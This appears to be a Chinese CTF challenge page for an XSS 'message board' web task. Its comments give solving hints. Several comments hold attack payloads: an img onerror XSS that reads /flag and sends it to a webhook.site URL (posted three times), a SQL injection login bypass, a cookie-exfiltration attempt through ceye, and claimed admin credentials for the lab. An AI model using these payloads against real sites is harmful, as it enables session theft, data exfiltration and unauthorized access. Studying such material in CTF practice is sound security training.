留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3508
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
厌弃. 18天前

好像登录才能触发xss

回复 0

小石 29天前

进入admin.php后,刷新不会弹出对话框,自己进去调试界面看一下cookie即可。

回复 0

Terrenc44 1月前

不用xss,dns外带一下,一样可以的

回复 0

追风的牛牛 1月前

笑死了,他把db那个数据库路径删除了

回复 0

song..22 3月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0

song..22 3月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 1

song..22 3月前

<img src=x onerror="fetch('/flag').then(r=>r.text()).then(d=>fetch('http://webhook.site/59ef6d33-3e0e-4a78-82f8-f38d98eff154?flag='+encodeURIComponent(d)))">

回复 0

Gcysnd 4月前

挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag

回复 0
xxsko 4月前

万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名

回复 0

2333m 4月前

触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)

回复 0

YS_JW 5月前

我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(20)

解题动态

woshicaocao 攻破了该题 20小时前
小白d 攻破了该题 3天前
mybugku26 攻破了该题 3天前
willow 攻破了该题 5天前
15219889677 攻破了该题 6天前
hys 攻破了该题 7天前
6ufui 攻破了该题 10天前
whshkdh 攻破了该题 11天前
lixing123 攻破了该题 11天前
岸环线南追玉兔 攻破了该题 12天前
tabwux 攻破了该题 12天前
juicebug 攻破了该题 12天前
耶无忧 攻破了该题 13天前
ljjbit 攻破了该题 14天前
LooP-lp 攻破了该题 14天前
chihaya anon 攻破了该题 15天前
Yan123 攻破了该题 15天前
__tian__ 攻破了该题 15天前
murder 攻破了该题 15天前
zuo 攻破了该题 15天前
问题反馈